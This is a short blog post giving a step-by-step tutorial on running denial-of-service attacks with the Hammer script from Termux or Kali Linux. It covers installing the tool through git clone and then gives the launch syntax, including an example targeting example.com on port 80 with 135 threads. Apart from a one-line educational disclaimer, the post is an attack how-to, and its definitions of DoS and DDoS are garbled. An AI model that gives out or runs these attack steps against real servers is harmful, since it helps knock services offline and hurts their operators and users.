Skip to main content

DoS and DDOS ATTACK using Termux & Kali linux Penetration Testing Tool

What is Dos and DDoS?

Dos : Attacker using single operating system to crack a server N-number of request to the server.

DDos : Attacker using multiple operating system to crack a server multiple N-number of request to the server .



Disclaimer : This is for informational and educational purposes only. 

Download Termux App : https://play.google.com/store/apps/details?id=com.termux

Hammer Tool GitHub : https://github.com/cyweb/hammer.git

Steps to Install Termux

step 1 : Open Termux

step 2 : pkg update

step 3 : pkg install python

step 4 : pkg install python 2

step 5 : pkg install git

step 6 : git clone https://github.com/cyweb/hammer.git

step 7 : Now Hammer Tool Cloning 

step 8 : Done After Successfully Installed

Steps to Install Kali linux

step 1 : Open Terminal

step 2: apt-get install python

step 3 :apt-get install python2

step 4 : apt-get install git

step 5 : git clone https://github.com/cyweb/hammer.git

step 6 : Now Hammer Tool Cloning 

step 7 : Done After Successfully Installed

Open the tool 

  • ls
  • cd hammer
  • ls
  • chmod +x hammer.py ( for getting permission to access)
  • ls
  • ./hammer.py
  • Now it will show how to use this tool


How to run Hammer Dos Script

Command syntax

  • ./hammer.py -s ip or site address -p port number -t turbo
  • ./hammer.py -s example.com -p 80 -t 135


    • Now Attack started sending n number of request (packet sending hammering)

    • Bot is hammering 



    ---------------------------------------------------------------------------Thanks to visit my page---------------------

    ------------------------------------------------------------

    Comments

    Post a Comment